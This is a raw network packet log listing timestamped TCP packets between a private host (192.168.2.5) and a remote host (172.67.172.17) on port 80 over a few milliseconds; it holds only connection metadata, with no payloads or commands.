Feb 25, 2021 11:05:05.429753065 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.433592081 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433623075 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433645010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433666945 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433692932 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.433693886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433717012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433737993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433756113 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.433760881 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433784962 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433790922 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.433832884 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433852911 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433860064 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.433871031 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433887959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433907032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433928967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433936119 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.433965921 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.433993101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434005976 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434019089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434042931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434043884 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434066057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434086084 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434087992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434113026 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434135914 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434144974 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434166908 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434175014 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434192896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434204102 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434211969 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434235096 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434251070 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434264898 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434272051 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434293985 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434315920 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434334040 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434340000 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434364080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434374094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434387922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434408903 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434427977 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434451103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434456110 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434473038 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434497118 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434516907 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434520006 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434542894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434564114 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434565067 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434586048 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434607029 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.434607983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.434634924 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435143948 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435195923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435219049 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435240030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435262918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435266018 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435286045 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435307980 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435317993 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435329914 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435344934 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435358047 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435378075 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435396910 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435400963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435422897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435446978 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435461998 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435470104 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435497046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435513020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435538054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435559034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435579062 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435580969 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435602903 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.435615063 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.435650110 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.436110973 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436140060 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436161995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436183929 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436208010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436212063 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.436229944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436252117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436260939 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.436275959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436305046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.436319113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436330080 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.436342955 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436364889 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436383009 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.436387062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436408997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436428070 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.436431885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.436475039 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443181992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443227053 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443245888 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443268061 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443289042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443311930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443339109 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443361044 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443361998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443382978 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443404913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443428040 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443428993 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443450928 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443454027 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443475008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443490982 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443496943 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443521976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443546057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443550110 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443567991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443592072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443592072 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443614960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443631887 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443636894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443661928 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443685055 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443686008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443711042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443736076 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.443754911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.443799973 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444094896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444119930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444144964 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444164991 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444168091 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444216013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444235086 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444242001 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444289923 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444294930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444315910 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444334030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444360018 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444365978 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444397926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444417953 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444421053 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444458008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444482088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444500923 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444504976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444525957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444536924 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444547892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444566965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444571972 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444588900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444608927 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444612980 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.444631100 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.444670916 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445053101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445070982 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445084095 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445095062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445106030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445121050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445147991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445166111 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445183992 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445188046 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445209980 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445214033 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445233107 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445242882 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445255041 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445275068 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445276976 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445297003 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445316076 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445318937 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445339918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445360899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445370913 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445395947 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445399046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445424080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.445485115 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.445987940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446011066 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446032047 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446054935 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446073055 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446079016 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446099997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446121931 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446122885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446146011 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446150064 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446167946 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446186066 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446187973 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446209908 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446228981 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446233034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446254015 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446273088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446275949 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446295023 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446312904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446317911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446333885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446351051 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446357012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446378946 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446403980 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446908951 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446929932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446952105 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446970940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.446974993 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.446995020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447012901 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447016954 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447035074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447043896 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447060108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447078943 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447081089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447104931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447124958 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447143078 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447144985 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447166920 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447184086 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447187901 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447206974 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447216034 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447232962 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447252035 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447254896 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447273016 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447293043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447309017 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447335958 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447848082 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447869062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447889090 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447909117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447911978 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447931051 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447949886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447971106 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.447973967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.447990894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.448029995 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.448044062 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.450438976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450469017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450489998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450510025 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450531960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450561047 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.450609922 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.450845003 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450870037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450892925 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450912952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450932026 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.450937986 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450957060 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.450959921 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.450980902 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.450983047 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451004982 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451025009 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451025963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451050043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451071978 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451087952 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451092005 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451112986 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451118946 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451136112 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451154947 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451157093 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451178074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451199055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451214075 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451221943 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451245070 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451248884 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451288939 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451431036 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451452971 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451474905 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451494932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451495886 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451519012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451539993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451556921 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451560974 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451581955 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451590061 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451605082 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451625109 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451626062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451647043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451663971 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451675892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451694965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451714039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451714993 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451735020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451757908 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451761007 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451777935 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451798916 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.451798916 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451822042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.451844931 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452428102 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452459097 CET	80	49727	172.67.172.17	192.168.2.5
